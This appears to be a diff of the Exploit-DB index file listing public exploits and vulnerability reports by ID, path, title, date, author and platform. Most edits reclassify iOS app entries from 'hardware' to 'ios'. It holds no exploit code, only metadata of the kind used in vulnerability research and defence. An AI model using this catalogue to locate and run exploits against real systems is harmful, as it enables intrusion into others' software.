26889,platforms/windows/local/26889.pl,"BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0
26890,platforms/hardware/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,hardware,webapps,0
26890,platforms/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,ios,webapps,0
26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - (.wav) Crash PoC",2013-07-16,ariarat,windows,dos,0
26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - (.wav) Crash PoC",2013-07-16,ariarat,windows,dos,0
26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0
@ -24031,9 +24031,9 @@ id,file,description,date,author,platform,type,port
26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 registration-form.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0
26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
26951,platforms/windows/dos/26951.py,"Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC",2013-07-18,ariarat,windows,dos,0
26952,platforms/hardware/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26953,platforms/hardware/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26954,platforms/hardware/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php, p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0
26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0
26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0
@ -24118,7 +24118,7 @@ id,file,description,date,author,platform,type,port
27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0
27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities",2013-07-23,Vulnerability-Lab,php,webapps,0
27041,platforms/windows/local/27041.pl,"Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0
27042,platforms/hardware/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,hardware,webapps,0
27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600
27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,metasploit,hardware,remote,0
27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,metasploit,linux,remote,443
@ -24261,8 +24261,8 @@ id,file,description,date,author,platform,type,port
27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0
27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 index.php $_SERVER['PHP_SELF'] XSS",2006-02-11,"GulfTech Security",php,webapps,0
27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Stored XSS",2013-07-29,drone,jsp,webapps,0
27188,platforms/hardware/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,hardware,webapps,0
27189,platforms/hardware/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability",2013-07-29,Vulnerability-Lab,hardware,webapps,0
27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,ios,webapps,0
27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability",2013-07-29,Vulnerability-Lab,ios,webapps,0
27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0
27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - Privilege Escalation Exploit",2013-07-29,sickness,windows,local,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
@ -24445,7 +24445,7 @@ id,file,description,date,author,platform,type,port
27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0
27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 search.php keyword Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0
27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0
27376,platforms/hardware/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,hardware,webapps,0
27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0
27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0
27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x Subject Field HTML Injection Vulnerability",2006-03-09,liz0,php,webapps,0
@ -24714,8 +24714,8 @@ id,file,description,date,author,platform,type,port
27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 Search.PHP Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0
27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0
27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80
27655,platforms/hardware/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0
27656,platforms/hardware/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0
27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0
27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.PHP Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0
27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.PHP Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0
@ -25124,7 +25124,7 @@ id,file,description,date,author,platform,type,port
28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0
28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28081,platforms/multiple/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",multiple,remote,0
28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0
28082,platforms/windows/remote/28082.rb,"MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",2013-09-04,metasploit,windows,remote,0
28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0
28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
@ -25276,7 +25276,7 @@ id,file,description,date,author,platform,type,port
28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.PHP Remote File Include Vulnerability",2006-07-17,Matdhule,php,webapps,0
28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x Server Date_Format Denial of Service Vulnerability",2006-07-18,"Christian Hammers",linux,dos,0
28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0
28236,platforms/hardware/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,hardware,webapps,0
28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 (.wav) - Crash PoC",2013-09-12,gunslinger_,windows,dos,0
28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067",2013-09-12,Vulnerability-Lab,windows,webapps,0
28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
@ -25988,10 +25988,10 @@ id,file,description,date,author,platform,type,port
28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0
28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0
28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0
28975,platforms/hardware/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28976,platforms/hardware/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28977,platforms/hardware/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28978,platforms/hardware/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0
28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0
28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability",2006-11-13,"Nuri Fattah",multiple,remote,0
@ -26599,7 +26599,7 @@ id,file,description,date,author,platform,type,port
29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0
29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0
29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29633,platforms/hardware/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",hardware,webapps,0
29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0
29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.PHP Directory Traversal Vulnerability",2007-02-22,"laurent gaffie",php,webapps,0
29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 install/index.php step Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0
@ -26943,7 +26943,7 @@ id,file,description,date,author,platform,type,port
29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30000,platforms/hardware/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,hardware,webapps,0
30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0
30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection Vulnerability",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
@ -26972,7 +26972,7 @@ id,file,description,date,author,platform,type,port
30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0
30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0
30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0
30031,platforms/hardware/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,hardware,webapps,0
30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0
30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0
30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0
30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0
@ -26994,7 +26994,7 @@ id,file,description,date,author,platform,type,port
30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
30054,platforms/jsp/webapps/30054.txt,"Sonicwall GMS 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0
30055,platforms/hardware/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0
30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0
30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0
@ -27077,8 +27077,8 @@ id,file,description,date,author,platform,type,port
30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0
30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0
30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0
30145,platforms/hardware/webapps/30145.txt,"Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,hardware,webapps,0
30146,platforms/hardware/webapps/30146.txt,"Print n Share v5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,hardware,webapps,0
30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,ios,webapps,0
30146,platforms/ios/webapps/30146.txt,"Print n Share v5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0
30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0
30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0
@ -27131,7 +27131,7 @@ id,file,description,date,author,platform,type,port
30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0
30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
30215,platforms/hardware/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,hardware,webapps,0
30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 AuthError.CFM Multiple Cross Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@ -27155,7 +27155,7 @@ id,file,description,date,author,platform,type,port
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - (.pls) DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
30245,platforms/hardware/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,hardware,webapps,0
30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0
30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0
@ -27193,6 +27193,7 @@ id,file,description,date,author,platform,type,port
30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0
30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0
30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0
30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability",2007-07-10,"Thor Larholm",linux,remote,0
30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include Vulnerability",2007-07-10,"Tim Brown",linux,remote,0
30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass Vulnerability",2007-07-10,Security-Assessment.com,windows,remote,0
@ -27214,7 +27215,7 @@ id,file,description,date,author,platform,type,port
30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0
30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0
30311,platforms/hardware/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,hardware,webapps,0
30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0
30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0
30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.PHP HTML Injection Vulnerability",2007-07-16,PescaoDeth,asp,webapps,0
30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger <= 8.1 Address Book Remote Buffer Overflow Vulnerabilitiy",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0
@ -27251,7 +27252,7 @@ id,file,description,date,author,platform,type,port
30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)",2013-12-17,"David Um",windows,remote,0
30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability",2013-12-17,"Arash Allebrahim",windows,local,0
30375,platforms/windows/local/30375.txt,"FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,windows,local,0
30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0
30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0
30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability",2007-07-24,"Adrian Pastor",php,webapps,0
30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting Vulnerability",2007-07-24,"Aria-Security Team",php,webapps,0
@ -27336,7 +27337,7 @@ id,file,description,date,author,platform,type,port
30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution",2013-12-24,metasploit,unix,remote,8080
30474,platforms/windows/remote/30474.rb,"Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,metasploit,windows,remote,0
30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
30476,platforms/hardware/webapps/30476.txt,"Song Exporter v2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,hardware,webapps,80
30476,platforms/ios/webapps/30476.txt,"Song Exporter v2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
30478,platforms/php/webapps/30478.txt,"php MBB cms 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0
@ -27810,6 +27811,7 @@ id,file,description,date,author,platform,type,port
30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0
30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability",2008-01-02,greyvoip,multiple,dos,0
30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0
30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
@ -28074,7 +28076,7 @@ id,file,description,date,author,platform,type,port
31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
